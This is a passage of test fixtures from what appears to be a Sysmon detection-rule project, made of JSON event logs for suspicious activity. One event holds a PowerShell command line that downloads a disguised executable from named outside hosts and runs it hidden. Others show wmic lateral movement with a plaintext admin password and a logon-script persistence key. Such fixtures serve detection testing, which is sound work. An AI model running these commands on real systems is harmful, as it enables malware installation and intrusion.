"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "10", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "3" 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/HeurZipExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\test.vbs\" ", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Microsoft ® Windows Based Script Host", 8 | "FileVersion": "5.8.7600.16385", 9 | "Hashes": "SHA1=851BD390BF559E702B8323062DBEB251D9F2F6F7,MD5=8886E0697B0A93C521F99099EF643450,SHA256=D73F7EE4E6E992A618D02580BDBF4FD6BA7C683D110928001092F4073341E95F,IMPHASH=7B5674BD1C2BBF9E981DAD834013AF2E", 10 | "Image": "C:\\Windows\\System32\\wscript.exe", 11 | "IntegrityLevel": "Medium", 12 | "LogonGuid": "{49F1AF32-DC25-5B05-0000-00207EB50400}", 13 | "LogonId": "0x4b57e", 14 | "ParentCommandLine": "C:\\Windows\\Explorer.EXE", 15 | "ParentImage": "C:\\Windows\\explorer.exe", 16 | "ParentProcessGuid": "{49F1AF32-DC26-5B05-0000-001016DF0400}", 17 | "ParentProcessId": "2284", 18 | "ProcessGuid": "{49F1AF32-DD57-5B05-0000-00101B280900}", 19 | "ProcessId": "2236", 20 | "Product": "Microsoft ® Windows Script Host", 21 | "TerminalSessionId": "1", 22 | "User": "CALDERA\\calduser2", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "908829", 31 | "Execution": { 32 | "ProcessID": "1404", 33 | "ThreadID": "1732" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "\"C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\malware.exe\" ", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "Windows Command Processor", 60 | "FileVersion": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", 61 | "Hashes": "SHA1=0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8,MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A", 62 | "Image": "C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\malware.exe", 63 | "IntegrityLevel": "Medium", 64 | "LogonGuid": "{49F1AF32-DC25-5B05-0000-00207EB50400}", 65 | "LogonId": "0x4b57e", 66 | "ParentCommandLine": "C:\\Windows\\Explorer.EXE", 67 | "ParentImage": "C:\\Windows\\explorer.exe", 68 | "ParentProcessGuid": "{49F1AF32-DC26-5B05-0000-001016DF0400}", 69 | "ParentProcessId": "2284", 70 | "ProcessGuid": "{49F1AF32-E29B-5B05-0000-001004911600}", 71 | "ProcessId": "1092", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "1", 74 | "User": "CALDERA\\calduser2", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "915850", 83 | "Execution": { 84 | "ProcessID": "1404", 85 | "ThreadID": "1732" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | -------------------------------------------------------------------------------- /tests/LargeCL512.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "PowerShell \"'PowerShell \"\"function Ktuakce([String] $dwjdasoigb){(New-Object System.Net.WebClient).DownloadFile($dwjdasoigb,''C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\Yvfytc.exe'');Start-Process ''C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\Yvfytc.exe'';}try{Ktuakce(''http://www.events4u.cz/kas23.png'')}catch{Ktuakce(''http://tregartha-dinnie.co.uk/kas23.png'')}'\"\" | Out-File -encoding ASCII -FilePath C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\Ryvqma-cgs.bat;Start-Process 'C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\Ryvqma-cgs.bat' -WindowStyle Hidden\"", 5 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Desktop\\", 6 | "Hashes": "SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C", 7 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", 8 | "IntegrityLevel": "Medium", 9 | "LogonGuid": "49F1AF32-4475-59DB-0000-0020B8040100", 10 | "LogonId": "0x000104b8", 11 | "ParentCommandLine": "cmd /c PowerShell \"'PowerShell \"\"function Ktuakce([String] $dwjdasoigb){(New-Object System.Net.WebClient).DownloadFile($dwjdasoigb,''%TMP%\\Yvfytc.exe'');Start-Process ''%TMP%\\Yvfytc.exe'';}try{Ktuakce(''http://www.events4u.cz/kas23.png'')}catch{Ktuakce(''http://tregartha-dinnie.co.uk/kas23.png'')}'\"\" | Out-File -encoding ASCII -FilePath %TMP%\\Ryvqma-cgs.bat;Start-Process '%TMP%\\Ryvqma-cgs.bat' -WindowStyle Hidden\"", 12 | "ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe", 13 | "ParentProcessGuid": "49F1AF32-5913-59DB-0000-0010023D3100", 14 | "ParentProcessId": "1564", 15 | "ProcessGuid": "49F1AF32-5913-59DB-0000-00101D483100", 16 | "ProcessId": "788", 17 | "TerminalSessionId": "1", 18 | "User": "GenEric-PC\\Gen Eric", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "230989", 27 | "Execution": { 28 | "ProcessID": "2160", 29 | "ThreadID": "2380" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/LateralWMI.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"wmic\" /node:calderadc.caldera.loc /user:\"caldera\\administrator\" /password:\"Admin123456\" process call create \"C:\\commander.exe -d -f\"", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "WMI Commandline Utility", 8 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 9 | "Hashes": "SHA1=071A645A88E4236281E58B90A5D50A2AC80E26E5,MD5=FD902835DEAEF4091799287736F3A028,SHA256=DA3AD32583644BD20116F0479C178F7C7C0B730728F4C02A438C0D19378C83D9,IMPHASH=15585CB74052B4739A900FCB332F06EA", 10 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\commander.exe -f", 15 | "ParentImage": "C:\\commander.exe", 16 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 17 | "ParentProcessId": "920", 18 | "ProcessGuid": "{49F1AF32-3AE6-5AC7-0000-0010FA181400}", 19 | "ProcessId": "2208", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "914937", 31 | "Execution": { 32 | "ProcessID": "1456", 33 | "ThreadID": "1712" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "\"wmic\" /node:calderadc.caldera.loc /user:\"caldera\\administrator\" /password:\"Admin123456\" process call create \"C:\\commander.exe -d -f\"", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "WMI Commandline Utility", 60 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 61 | "Hashes": "SHA1=071A645A88E4236281E58B90A5D50A2AC80E26E5,MD5=FD902835DEAEF4091799287736F3A028,SHA256=DA3AD32583644BD20116F0479C178F7C7C0B730728F4C02A438C0D19378C83D9,IMPHASH=15585CB74052B4739A900FCB332F06EA", 62 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\commander.exe -f", 67 | "ParentImage": "C:\\commander.exe", 68 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 69 | "ParentProcessId": "920", 70 | "ProcessGuid": "{49F1AF32-3B60-5AC7-0000-001086C41400}", 71 | "ProcessId": "2484", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "917156", 83 | "Execution": { 84 | "ProcessID": "1456", 85 | "ThreadID": "1712" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | { 106 | "Event": { 107 | "EventData": { 108 | "CommandLine": "\"wmic\" /node:calderadc.caldera.loc /user:\"caldera\\administrator\" /password:\"Admin123456\" process call create \"C:\\commander.exe -d -f\"", 109 | "Company": "Microsoft Corporation", 110 | "CurrentDirectory": "C:\\Windows\\system32\\", 111 | "Description": "WMI Commandline Utility", 112 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 113 | "Hashes": "SHA1=071A645A88E4236281E58B90A5D50A2AC80E26E5,MD5=FD902835DEAEF4091799287736F3A028,SHA256=DA3AD32583644BD20116F0479C178F7C7C0B730728F4C02A438C0D19378C83D9,IMPHASH=15585CB74052B4739A900FCB332F06EA", 114 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 115 | "IntegrityLevel": "System", 116 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 117 | "LogonId": "0x3e7", 118 | "ParentCommandLine": "C:\\commander.exe -f", 119 | "ParentImage": "C:\\commander.exe", 120 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 121 | "ParentProcessId": "920", 122 | "ProcessGuid": "{49F1AF32-3BDB-5AC7-0000-00105C451800}", 123 | "ProcessId": "1884", 124 | "Product": "Microsoft® Windows® Operating System", 125 | "TerminalSessionId": "0", 126 | "User": "NT AUTHORITY\\SYSTEM", 127 | "UtcTime": "4242-04-24 13:37:42.422" 128 | }, 129 | "System": { 130 | "Channel": "Microsoft-Windows-Sysmon/Operational", 131 | "Computer": "BLAHBLAH", 132 | "Correlation": {}, 133 | "EventID": "1", 134 | "EventRecordID": "919654", 135 | "Execution": { 136 | "ProcessID": "1456", 137 | "ThreadID": "1712" 138 | }, 139 | "Keywords": "0x8000000000000000", 140 | "Level": "4", 141 | "Opcode": "0", 142 | "Provider": { 143 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 144 | "Name": "Microsoft-Windows-Sysmon" 145 | }, 146 | "Security": { 147 | "UserID": "S-1-5-18" 148 | }, 149 | "Task": "1", 150 | "TimeCreated": { 151 | "SystemTime": "4242-04-24 13:37:42.422" 152 | }, 153 | "Version": "5" 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /tests/MaliciousSvchostAccess.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32\\KERNELBASE.dll+189b7|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2b86b7|UNKNOWN(000007FE941D519A)", 5 | "GrantedAccess": "0x1f1fff", 6 | "SourceImage": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 7 | "SourceProcessGUID": "49F1AF32-9930-5A1E-0000-0010593C0A00", 8 | "SourceProcessId": "2412", 9 | "SourceThreadId": "3348", 10 | "TargetImage": "C:\\Windows\\System32\\svchost.exe", 11 | "TargetProcessGUID": "49F1AF32-98FC-5A1E-0000-0010A7DA0000", 12 | "TargetProcessId": "820", 13 | "UtcTime": "4242-04-24 13:37:42.422" 14 | }, 15 | "System": { 16 | "Channel": "Microsoft-Windows-Sysmon/Operational", 17 | "Computer": "BLAHBLAH", 18 | "Correlation": {}, 19 | "EventID": "10", 20 | "EventRecordID": "145999", 21 | "Execution": { 22 | "ProcessID": "1324", 23 | "ThreadID": "1940" 24 | }, 25 | "Keywords": "0x8000000000000000", 26 | "Level": "4", 27 | "Opcode": "0", 28 | "Provider": { 29 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 30 | "Name": "Microsoft-Windows-Sysmon" 31 | }, 32 | "Security": { 33 | "UserID": "S-1-5-18" 34 | }, 35 | "Task": "10", 36 | "TimeCreated": { 37 | "SystemTime": "4242-04-24 13:37:42.422" 38 | }, 39 | "Version": "3" 40 | } 41 | } 42 | } 43 | { 44 | "Event": { 45 | "EventData": { 46 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32\\KERNELBASE.dll+189b7|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2b86b7|UNKNOWN(000007FE941D519A)", 47 | "GrantedAccess": "0x1f1fff", 48 | "SourceImage": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 49 | "SourceProcessGUID": "49F1AF32-9930-5A1E-0000-0010593C0A00", 50 | "SourceProcessId": "2412", 51 | "SourceThreadId": "3348", 52 | "TargetImage": "C:\\Windows\\System32\\svchost.exe", 53 | "TargetProcessGUID": "49F1AF32-98FC-5A1E-0000-0010A7DA0000", 54 | "TargetProcessId": "820", 55 | "UtcTime": "4242-04-24 13:37:42.422" 56 | }, 57 | "System": { 58 | "Channel": "Microsoft-Windows-Sysmon/Operational", 59 | "Computer": "BLAHBLAH", 60 | "Correlation": {}, 61 | "EventID": "10", 62 | "EventRecordID": "145999", 63 | "Execution": { 64 | "ProcessID": "1324", 65 | "ThreadID": "1940" 66 | }, 67 | "Keywords": "0x8000000000000000", 68 | "Level": "4", 69 | "Opcode": "0", 70 | "Provider": { 71 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 72 | "Name": "Microsoft-Windows-Sysmon" 73 | }, 74 | "Security": { 75 | "UserID": "S-1-5-18" 76 | }, 77 | "Task": "10", 78 | "TimeCreated": { 79 | "SystemTime": "4242-04-24 13:37:42.422" 80 | }, 81 | "Version": "3" 82 | } 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /tests/Nbtstat.exe.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"nbtstat\" -n", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "TCP/IP NetBios Information", 8 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 9 | "Hashes": "SHA1=68DBA140959ED155F720060C5466F5FD90A176F6,MD5=D6A9FE571146099D6D75A8E4E7871506,SHA256=F63D1A87E8D264321BD2EF30B017758EF77CF741849F3F7F214BB169C0C9A461,IMPHASH=FD8908AC8524F3754D53A83833416369", 10 | "Image": "C:\\Windows\\System32\\nbtstat.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\commander.exe -f", 15 | "ParentImage": "C:\\commander.exe", 16 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 17 | "ParentProcessId": "920", 18 | "ProcessGuid": "{49F1AF32-38D6-5AC7-0000-0010643B0D00}", 19 | "ProcessId": "2912", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "898632", 31 | "Execution": { 32 | "ProcessID": "1456", 33 | "ThreadID": "1712" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/NewAutorun.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Details": "C:\\Users\\Gen Eric\\AppData\\Local\\cdnver.bat", 5 | "EventType": "SetValue", 6 | "Image": "C:\\Programdata\\Q7Y9F5Z1.exe", 7 | "ProcessGuid": "{49F1AF32-0032-5AD6-0000-00104E2E0E00}", 8 | "ProcessId": "2884", 9 | "TargetObject": "HKU\\S-1-5-21-2888932017-1170430559-1631822473-1000\\Environment\\UserInitMprLogonScript", 10 | "UtcTime": "4242-04-24 13:37:42.422" 11 | }, 12 | "System": { 13 | "Channel": "Microsoft-Windows-Sysmon/Operational", 14 | "Computer": "BLAHBLAH", 15 | "Correlation": {}, 16 | "EventID": "13", 17 | "EventRecordID": "36442", 18 | "Execution": { 19 | "ProcessID": "2948", 20 | "ThreadID": "3028" 21 | }, 22 | "Keywords": "0x8000000000000000", 23 | "Level": "4", 24 | "Opcode": "0", 25 | "Provider": { 26 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 27 | "Name": "Microsoft-Windows-Sysmon" 28 | }, 29 | "Security": { 30 | "UserID": "S-1-5-18" 31 | }, 32 | "Task": "13", 33 | "TimeCreated": { 34 | "SystemTime": "4242-04-24 13:37:42.422" 35 | }, 36 | "Version": "2" 37 | } 38 | } 39 | } 40 | { 41 | "Event": { 42 | "EventData": { 43 | "Details": "C:\\Users\\Gen Eric\\AppData\\Local\\cdnver.bat", 44 | "EventType": "SetValue", 45 | "Image": "C:\\Programdata\\Q1S5F1P6.exe", 46 | "ProcessGuid": "49F1AF32-64CC-5A74-0000-001069AB0900", 47 | "ProcessId": "2688", 48 | "TargetObject": "HKU\\S-1-5-21-2888932017-1170430559-1631822473-1000\\Environment\\UserInitMprLogonScript", 49 | "UtcTime": "4242-04-24 13:37:42.422" 50 | }, 51 | "System": { 52 | "Channel": "Microsoft-Windows-Sysmon/Operational", 53 | "Computer": "BLAHBLAH", 54 | "Correlation": {}, 55 | "EventID": "13", 56 | "EventRecordID": "104965", 57 | "Execution": { 58 | "ProcessID": "1376", 59 | "ThreadID": "1964" 60 | }, 61 | "Keywords": "0x8000000000000000", 62 | "Level": "4", 63 | "Opcode": "0", 64 | "Provider": { 65 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 66 | "Name": "Microsoft-Windows-Sysmon" 67 | }, 68 | "Security": { 69 | "UserID": "S-1-5-18" 70 | }, 71 | "Task": "13", 72 | "TimeCreated": { 73 | "SystemTime": "4242-04-24 13:37:42.422" 74 | }, 75 | "Version": "2" 76 | } 77 | } 78 | } 79 | { 80 | "Event": { 81 | "EventData": { 82 | "Details": "C:\\Users\\Gen Eric\\AppData\\Local\\cdnver.bat", 83 | "EventType": "SetValue", 84 | "Image": "C:\\Programdata\\Q1S5F1P6.exe", 85 | "ProcessGuid": "49F1AF32-64CC-5A74-0000-001069AB0900", 86 | "ProcessId": "2688", 87 | "TargetObject": "HKCR\\WOW6432Node\\CLSID\\{21FFB6C0-0DA1-11D5-A9D5-00500413153C}\\ibprdo", 88 | "UtcTime": "4242-04-24 13:37:42.422" 89 | }, 90 | "System": { 91 | "Channel": "Microsoft-Windows-Sysmon/Operational", 92 | "Computer": "BLAHBLAH", 93 | "Correlation": {}, 94 | "EventID": "13", 95 | "EventRecordID": "104965", 96 | "Execution": { 97 | "ProcessID": "1376", 98 | "ThreadID": "1964" 99 | }, 100 | "Keywords": "0x8000000000000000", 101 | "Level": "4", 102 | "Opcode": "0", 103 | "Provider": { 104 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 105 | "Name": "Microsoft-Windows-Sysmon" 106 | }, 107 | "Security": { 108 | "UserID": "S-1-5-18" 109 | }, 110 | "Task": "13", 111 | "TimeCreated": { 112 | "SystemTime": "4242-04-24 13:37:42.422" 113 | }, 114 | "Version": "2" 115 | } 116 | } 117 | } 118 | -------------------------------------------------------------------------------- /tests/NewExeCreatedInRoot.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2018-04-06 09:16:19.947", 5 | "Image": "System", 6 | "ProcessGuid": "{8C352DC7-327F-5AC7-0000-0010EB030000}", 7 | "ProcessId": "4", 8 | "TargetFilename": "C:\\commander.exe", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "11", 16 | "EventRecordID": "239376", 17 | "Execution": { 18 | "ProcessID": "1568", 19 | "ThreadID": "1984" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "11", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "2" 36 | } 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /tests/OfficeDropper.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2017-10-09 09:53:58.335", 5 | "Image": "C:\\Program Files (x86)\\Microsoft Office\\Office12\\WINWORD.EXE", 6 | "ProcessGuid": "49F1AF32-4730-59DB-0000-0010A9950700", 7 | "ProcessId": "2168", 8 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "11", 16 | "EventRecordID": "21042", 17 | "Execution": { 18 | "ProcessID": "2160", 19 | "ThreadID": "2380" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "11", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "2" 36 | } 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /tests/OfficeDropperExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "C:\\Programdata\\Q7Y9F5Z1.exe", 5 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Documents\\", 6 | "Hashes": "SHA1=8D6DB316EA4E348021CB59CF3C6EC65C390F0497,MD5=36524C90CA1FAC2102E7653DFADB31B2,SHA256=FF808D0A12676BFAC88FD26F955154F8884F2BB7C534B9936510FD6296C543E8,IMPHASH=7CFC69E858A62E1E5A68D5510338C173", 7 | "Image": "C:\\ProgramData\\Q7Y9F5Z1.exe", 8 | "IntegrityLevel": "Medium", 9 | "LogonGuid": "{49F1AF32-651B-5ABB-0000-00205D120100}", 10 | "LogonId": "0x1125d", 11 | "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\" /e", 12 | "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE", 13 | "ParentProcessGuid": "{49F1AF32-001D-5AD6-0000-0010A0430D00}", 14 | "ParentProcessId": "2700", 15 | "ProcessGuid": "{49F1AF32-0032-5AD6-0000-00104E2E0E00}", 16 | "ProcessId": "2884", 17 | "TerminalSessionId": "1", 18 | "User": "GenEric-PC\\Gen Eric", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "36378", 27 | "Execution": { 28 | "ProcessID": "2948", 29 | "ThreadID": "3028" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | { 50 | "Event": { 51 | "EventData": { 52 | "CommandLine": "C:\\Programdata\\Q1S5F1P6.exe", 53 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Documents\\", 54 | "Hashes": "SHA1=8D6DB316EA4E348021CB59CF3C6EC65C390F0497,MD5=36524C90CA1FAC2102E7653DFADB31B2,SHA256=FF808D0A12676BFAC88FD26F955154F8884F2BB7C534B9936510FD6296C543E8,IMPHASH=7CFC69E858A62E1E5A68D5510338C173", 55 | "Image": "C:\\ProgramData\\Q1S5F1P6.exe", 56 | "IntegrityLevel": "Medium", 57 | "LogonGuid": 